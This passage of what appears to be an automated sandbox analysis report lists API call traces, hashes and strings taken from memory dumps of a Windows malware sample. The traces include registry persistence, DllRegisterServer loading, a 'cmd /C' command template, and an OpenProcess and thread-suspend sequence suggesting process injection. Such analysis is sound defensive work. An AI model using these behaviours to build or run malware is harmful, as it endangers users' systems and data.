    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
